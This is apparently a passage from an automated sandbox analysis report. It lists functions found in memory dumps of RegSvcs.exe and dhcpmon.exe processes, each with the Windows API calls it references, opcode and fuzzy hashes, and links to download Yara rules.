              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: efbf3e1a0aa718f123902cb6201e6fed07890fe20587cc67b944774372faab9c
              • Instruction ID: f6ac84325fe95b96c41d52ef495523a9533d967f82639d7758eae4d35c77f290
              • Opcode Fuzzy Hash: efbf3e1a0aa718f123902cb6201e6fed07890fe20587cc67b944774372faab9c
              • Instruction Fuzzy Hash: 79D012301057D0EFDA1627B074395D77F78491111938106DAF885D7643CA3A4A15C6B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 072227D0, Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9755255d4867271c7faf9a7abe7c60e0c56a938538de7a35491907913fde0c2
              • Instruction ID: ed7b1bf9d277b36b38f2b8cea1879a2d1dbb3bfbf7394f02d84126ec94c8b240
              • Opcode Fuzzy Hash: a9755255d4867271c7faf9a7abe7c60e0c56a938538de7a35491907913fde0c2
              • Instruction Fuzzy Hash: 95D0A7B003E250EFC3159F919E174953B7AAA02900F024982E541CE079DE508F099362
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07223B20, Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b11e4938d067eb333e91365e5b52ac6e140a88855e1a8b89c647c80cb07da11a
              • Instruction ID: 0242b1db6abb3fd30684ad5a7459629ae9fcf5f44eaf6f9d0382c261535d3891
              • Opcode Fuzzy Hash: b11e4938d067eb333e91365e5b52ac6e140a88855e1a8b89c647c80cb07da11a
              • Instruction Fuzzy Hash: 2FD012B0138274EB8604EE61E498434B375A74B304B504659D40F4F213D7FBEC039A40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 072219FA, Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6d800c804cf2f168a82901344ae281f4fafd8606ecb66888af4684f7bb254e72
              • Instruction ID: 50ccc981d2c6f35354069e60cc9b1233dbc18c522ce113b9a6b4f002499f0eea
              • Opcode Fuzzy Hash: 6d800c804cf2f168a82901344ae281f4fafd8606ecb66888af4684f7bb254e72
              • Instruction Fuzzy Hash: 38C012C1A3C0D1ABDF4475D09821769272177D3200F894595841615192D758ED02A356
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07224784, Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f0289c3075159c542a16adf224c755afa117dc59aebf3a67208550b5aff3f940
              • Instruction ID: f71ce526f8bd430b0f3a683061301ef3be42f9a7df217108122b28ad1ae8b504
              • Opcode Fuzzy Hash: f0289c3075159c542a16adf224c755afa117dc59aebf3a67208550b5aff3f940
              • Instruction Fuzzy Hash: 58C04C76A2401E9ADB006B95F4453ECBB64F781329F100066E61D5254187B5055557D1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07222800, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: faec97fd46e71858fab3a4468c668253a029de23d0dd73056000d8c89bb047bd
              • Instruction ID: f1a70fda72b6d22244b2d6902f8bc2a60f70c5863d78f8d6bd2d058d140cc78f
              • Opcode Fuzzy Hash: faec97fd46e71858fab3a4468c668253a029de23d0dd73056000d8c89bb047bd
              • Instruction Fuzzy Hash: F9B09B7003C124FB41509B52D915C5576AEF642104F518910E502450745F95EF0555A6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07224A90, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 51df99a3478d4e12fa52396ca65f19173208538667784d8c288ba64de2d1fb16
              • Instruction ID: 5a431436c41e59682c027b0236021c0fd287881f5fef3ef19730f098eedb99a6
              • Opcode Fuzzy Hash: 51df99a3478d4e12fa52396ca65f19173208538667784d8c288ba64de2d1fb16
              • Instruction Fuzzy Hash: F5B0123050070897990433F0300C61DB2AD4A4000A3C00354E50D82B03DE39A4040867
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07221899, Relevance: .0, Instructions: 6COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a960204d2465aec33d4c7766188bc527c458713b79f399fbe2e381121398ae24
              • Instruction ID: eaa37d3d959ce3cbdb6e0beae131b8ed95aee60514a2d22e802d5c11abebf463
              • Opcode Fuzzy Hash: a960204d2465aec33d4c7766188bc527c458713b79f399fbe2e381121398ae24
              • Instruction Fuzzy Hash: CAB09232402344DBDB2AAE20A5498203726AB84246B211868D012862108B3A5C81CE80
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: RegSvcs.exe PID: 2148 Parent PID: 664 RegSvcs.exeCOMMON

              Executed Functions

              Function 027C0744, Relevance: 1.7, APIs: 1, Instructions: 168COMMON
              Download Yara Rule
              APIs
              • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 027C1BEB
              Memory Dump Source
              • Source File: 00000009.00000002.411612756.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
              Similarity
              • API ID: PathSearch
              • String ID:
              • API String ID: 2203818243-0
              • Opcode ID: bc7ec508d30a772168ed9d1db410149cca93dc6e53b69a817189ece1a69fd72b
              • Instruction ID: 644ec5465f7d2474f21b3efaf0d1eecc4333090749ebe317aae9bb772d0b9b6d
              • Opcode Fuzzy Hash: bc7ec508d30a772168ed9d1db410149cca93dc6e53b69a817189ece1a69fd72b
              • Instruction Fuzzy Hash: 277103B0E002199FDB24CFA9C98469EBBF1FF48314F64812EE819AB351D734A945CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 027C1A3C, Relevance: 1.7, APIs: 1, Instructions: 167COMMON
              Download Yara Rule
              APIs
              • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 027C1BEB
              Memory Dump Source
              • Source File: 00000009.00000002.411612756.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
              Similarity
              • API ID: PathSearch
              • String ID:
              • API String ID: 2203818243-0
              • Opcode ID: 29dd3cc103af4e286abf94bc8d1117e9ad0b44f16dd1e1288c2e20485f4c3e09
              • Instruction ID: 4de969e865ef814a6c9fac8c555dbbd57e1406032a76dba93c534ec18ccc7168
              • Opcode Fuzzy Hash: 29dd3cc103af4e286abf94bc8d1117e9ad0b44f16dd1e1288c2e20485f4c3e09
              • Instruction Fuzzy Hash: 557114B0E002198FDB24CFA9C9946DEBBF1BF48314F64812DE819A7351D734A945CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: dhcpmon.exe PID: 5076 Parent PID: 664 dhcpmon.exeCOMMON

              Executed Functions

              Function 01300728, Relevance: 1.7, APIs: 1, Instructions: 179COMMON
              Download Yara Rule
              APIs
              • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 01301BEB
              Memory Dump Source
              • Source File: 0000000D.00000002.414191756.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
              Similarity
              • API ID: PathSearch
              • String ID:
              • API String ID: 2203818243-0
              • Opcode ID: b4d25508d7c85e8c791edfb4e0f7d4260b5943c895133c447cdede01b657f9b9
              • Instruction ID: 57d33ba4458e48793d934f299f875941fb2aff5e26730bb094452fbad346c919
              • Opcode Fuzzy Hash: b4d25508d7c85e8c791edfb4e0f7d4260b5943c895133c447cdede01b657f9b9
              • Instruction Fuzzy Hash: 23711470D006198FDF25CF99C894ADEBBF5BF48318F14852AE819AB390DB34A945CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01301A3C, Relevance: 1.7, APIs: 1, Instructions: 169COMMON
              Download Yara Rule
              APIs
              • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 01301BEB
              Memory Dump Source
              • Source File: 0000000D.00000002.414191756.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
              Similarity
              • API ID: PathSearch
              • String ID:
              • API String ID: 2203818243-0
              • Opcode ID: 6f16b7b0125e901c899be840f8ab0360f3e22dffc7866a4ee7f7cb1bf1e7b067
              • Instruction ID: 684c62cb5e011399cf612be1ae564b56b51e18b86024438a4a1b687469015df2
              • Opcode Fuzzy Hash: 6f16b7b0125e901c899be840f8ab0360f3e22dffc7866a4ee7f7cb1bf1e7b067
              • Instruction Fuzzy Hash: 6D71F274E006198FDF25CF99C9946DEBBF1BF48318F24812AE819AB390D774A945CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01300744, Relevance: 1.7, APIs: 1, Instructions: 168COMMON
              Download Yara Rule
              APIs
              • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 01301BEB
              Memory Dump Source
              • Source File: 0000000D.00000002.414191756.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
              Similarity
              • API ID: PathSearch
              • String ID:
              • API String ID: 2203818243-0
              • Opcode ID: 759f656bcbc120fddf36e961e8dd180074103decd62095249ba26b72177046ad
              • Instruction ID: 2fb4d0268d2b9c86e6c7ac48e4258d8806622a1b49662cf81ad74de0a3ea624a
              • Opcode Fuzzy Hash: 759f656bcbc120fddf36e961e8dd180074103decd62095249ba26b72177046ad
              • Instruction Fuzzy Hash: 1C711374E006198FDF25CF99C9946DEBBF1BF48318F248129E819AB390D734A945CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01301C9F, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.414191756.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c8b62165bba35dc4a50d29aa756722a9a19324613df3df7f310b99e129d7ae57
              • Instruction ID: d4b65739f92339b03734a7928ac429e186e941b5b8b0a38bcdf135293b56230d
              • Opcode Fuzzy Hash: c8b62165bba35dc4a50d29aa756722a9a19324613df3df7f310b99e129d7ae57
              • Instruction Fuzzy Hash: A13128709002089FDF22DF98C9A47DEBBF5AF08318F204169D405AB291D779E945CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: RegSvcs.exe PID: 3560 Parent PID: 1048 RegSvcs.exeCOMMON

              Executed Functions

              Function 051493E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0514962E
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: 749fbbeaa81bb7e36ffd8b6639b5f4d1c9cd105b96ff4440067b00b85c52ab15
              • Instruction ID: c96f397ca488cf33b9f74af89e4dab0279136a931433d6efde340cff8eb97a96
              • Opcode Fuzzy Hash: 749fbbeaa81bb7e36ffd8b6639b5f4d1c9cd105b96ff4440067b00b85c52ab15
              • Instruction Fuzzy Hash: D4713470A00B058FD724DF6AC54579BBBF6BF88214F048A2ED486DBA40DB34E805CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514FB98, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0514FD0A
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID:
              • API String ID: 716092398-0
              • Opcode ID: 3bc07689fb26a19ed68d86ff900d5bc0f2b76678b76d164948cd003072a48ea6
              • Instruction ID: e3afc511e3973c74e59bd0ccfe1b4f9536146461dcb0e1f8fac906353ebcbc71
              • Opcode Fuzzy Hash: 3bc07689fb26a19ed68d86ff900d5bc0f2b76678b76d164948cd003072a48ea6
              • Instruction Fuzzy Hash: B35113B5C04249AFDF01CFA5C984ACEBFB1FF48314F24816AE808AB221C7719955CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514FB61, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0514FD0A
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID:
              • API String ID: 716092398-0
              • Opcode ID: ade4d9c25b694cb48a5bdc73fc16be8a38aa2930b2f36ee1ba63877271f53377
              • Instruction ID: b944e36c208f05b006bfd4d38111a9c6d433fb94274bd578d3115fb5ef6e54fc
              • Opcode Fuzzy Hash: ade4d9c25b694cb48a5bdc73fc16be8a38aa2930b2f36ee1ba63877271f53377
              • Instruction Fuzzy Hash: 0151E0B1D042499FDB14CFA9D884ADEBBF1BF48314F24852AE819AB310D774A945CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514DA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0514FD0A
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID:
              • API String ID: 716092398-0
              • Opcode ID: e6401a377c8f18709f269d457b76801883f5117a44dcd07c5f1ee2a40715eecc
              • Instruction ID: 201f462d55a01e7e48020546631670cd1fc80ddca5520ed7252c97b069b6b52f
              • Opcode Fuzzy Hash: e6401a377c8f18709f269d457b76801883f5117a44dcd07c5f1ee2a40715eecc
              • Instruction Fuzzy Hash: 9D51BDB5D003099FDB14CFA9C984ADEBBF5BF88314F24852AE819AB310D774A845CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514A14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0514BCC6,?,?,?,?,?), ref: 0514BD87
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: fcd147e2674abc48ef89eef6caa163d501e0adcef0171f892ce1be7f299f359a
              • Instruction ID: c13b6db16f99c777d16a94f7c9c2af469a4077b183e748d39834b14cbebe3347
              • Opcode Fuzzy Hash: fcd147e2674abc48ef89eef6caa163d501e0adcef0171f892ce1be7f299f359a
              • Instruction Fuzzy Hash: 3B21E5B59042089FDF10CF99D984ADEBBF9EB48324F14845AE915B3310D378A954CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0514BCC6,?,?,?,?,?), ref: 0514BD87
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: e9e56dc01ad1bbbf41962a9a77da084603cdfdda8b862d63bfdc6a2ab4a54862
              • Instruction ID: a38fea9c3a94410cc57190c5aec7a2360374752ab069d6a2e53464e09e1dcf2d
              • Opcode Fuzzy Hash: e9e56dc01ad1bbbf41962a9a77da084603cdfdda8b862d63bfdc6a2ab4a54862
              • Instruction Fuzzy Hash: 7521E5B59042499FDB10CFA9D584ADEBFF8EF48324F14845AE954B3310C378A954CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05148768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,051496A9,00000800,00000000,00000000), ref: 051498BA
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 244f57ab13a307691273446539d90ad9fd2ce60a519d6af1c29167660ce29e39
              • Instruction ID: 37ee32c7610976a8eaa4a468e0ca3559a97327bec102829dcd566ec690375894
              • Opcode Fuzzy Hash: 244f57ab13a307691273446539d90ad9fd2ce60a519d6af1c29167660ce29e39
              • Instruction Fuzzy Hash: C711D3B6D042099FDB10CF9AD444BDEBBF8EB88324F14842AE515B7600C779A945CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05149849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,051496A9,00000800,00000000,00000000), ref: 051498BA
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 971202cdce1c96180432ef99aa275cb63bd69b9668b0d030d380b01835d98564
              • Instruction ID: 92b17a9ebc1470535e030cd4a1c9ecee78003ab0f45afb7c28588ec998146e5f
              • Opcode Fuzzy Hash: 971202cdce1c96180432ef99aa275cb63bd69b9668b0d030d380b01835d98564
              • Instruction Fuzzy Hash: AE11E4B6D002099FDB10CF9AD448ADEFBF8EB88324F14852AE915B7600C774A945CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 051495C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0514962E
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: 6d9f243920a50b367712d80bfb9426626b5d545aba8d2b93df1f519d39aff8ba
              • Instruction ID: 3cb2ca69ab2f0a3deac043d290bbadb8ea590833ed360ce7d023b20797aa0f0b
              • Opcode Fuzzy Hash: 6d9f243920a50b367712d80bfb9426626b5d545aba8d2b93df1f519d39aff8ba
              • Instruction Fuzzy Hash: A711DFB6C006498FDB20CF9AC444BDEFBF8AB88224F14842AD819B7600C378A545CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514DA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0514FE28,?,?,?,?), ref: 0514FE9D
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: d9a0cdd37080d3228a958e1b7b4b8244056da96596730d41553a2827c14224b2
              • Instruction ID: ed903c516821d8397d6d5103510e4aeaebfef5f8fb337f0320c110b0df47f19c
              • Opcode Fuzzy Hash: d9a0cdd37080d3228a958e1b7b4b8244056da96596730d41553a2827c14224b2
              • Instruction Fuzzy Hash: 2D1106B58002499FDB10CF99D589BDFBBF8EB48324F14841AE915B7301C374A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0514FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0514FE28,?,?,?,?), ref: 0514FE9D
              Memory Dump Source
              • Source File: 00000013.00000002.450513607.0000000005140000.00000040.00000001.sdmp, Offset: 05140000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: 21b29a9c782974eed96772dfcea050d2f391904fc114eb2facef80011b9d7f25
              • Instruction ID: 302a317d5831ab93776cf6d79f87b0b3cf4ead74e91a14fc5b8be19f6c542f8b
              • Opcode Fuzzy Hash: 21b29a9c782974eed96772dfcea050d2f391904fc114eb2facef80011b9d7f25
              • Instruction Fuzzy Hash: 2A1103B58002099FDB10CF99D589BDEFBF8EB48324F24841AE915B3341C374A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9D4A0, Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.447391277.0000000000F9D000.00000040.00000001.sdmp, Offset: 00F9D000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c37fc426370d83a5b42e87c5d48af7c21256579eb098a2f990e9bd2f9f578ec
              • Instruction ID: e80fffdc174fe9476285bf1192633bd7ae1370288d383964f9c66a9a59c3d6df
              • Opcode Fuzzy Hash: 6c37fc426370d83a5b42e87c5d48af7c21256579eb098a2f990e9bd2f9f578ec
              • Instruction Fuzzy Hash: 15216A72904200DFEF01CF54D9C0B26BFA5FB88328F38C569D9050B246C336E846E7A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 010FD01C, Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.449264280.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8006d212d4958417875c412cc9ae30178f17d49d463d261382f1219f91357a06
              • Instruction ID: 2f24bd0e8596f472b4f4fde68def3a694acbe660673c806adb0eb3fbdaa8806d
              • Opcode Fuzzy Hash: 8006d212d4958417875c412cc9ae30178f17d49d463d261382f1219f91357a06
              • Instruction Fuzzy Hash: F8213771504200DFDB15CF94D4C4B16BBA5FB84354F24CAADEA894B746C736D847CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9D49B, Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.447391277.0000000000F9D000.00000040.00000001.sdmp, Offset: 00F9D000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 402f82f9f4d088c765880f7ac4e3a8c4448ff8fcb2d345b33124a7443b5bf68b
              • Instruction ID: ed56e417a745253d740a925690f2d9596c61985c3a93df7a3e0c3877040c06a7
              • Opcode Fuzzy Hash: 402f82f9f4d088c765880f7ac4e3a8c4448ff8fcb2d345b33124a7443b5bf68b
              • Instruction Fuzzy Hash: 5F11AF76804280CFDF12CF14D5C4B16BF71FB94324F2886A9D8050B656C336D85ADBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 010FD017, Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.449264280.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 50d6e6a0dc59b032566d204e462647310ba8800d8e06c08d79e40233fa68d11e
              • Instruction ID: ca991a16311e649afc97ad5401a3cc280f6e0f13308174c904ea88f801736e0b
              • Opcode Fuzzy Hash: 50d6e6a0dc59b032566d204e462647310ba8800d8e06c08d79e40233fa68d11e
              • Instruction Fuzzy Hash: E511BE75504280CFCB12CF54D5C4B15FBA2FB84314F28C6AEE9494BA56C33AD44BCB61
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions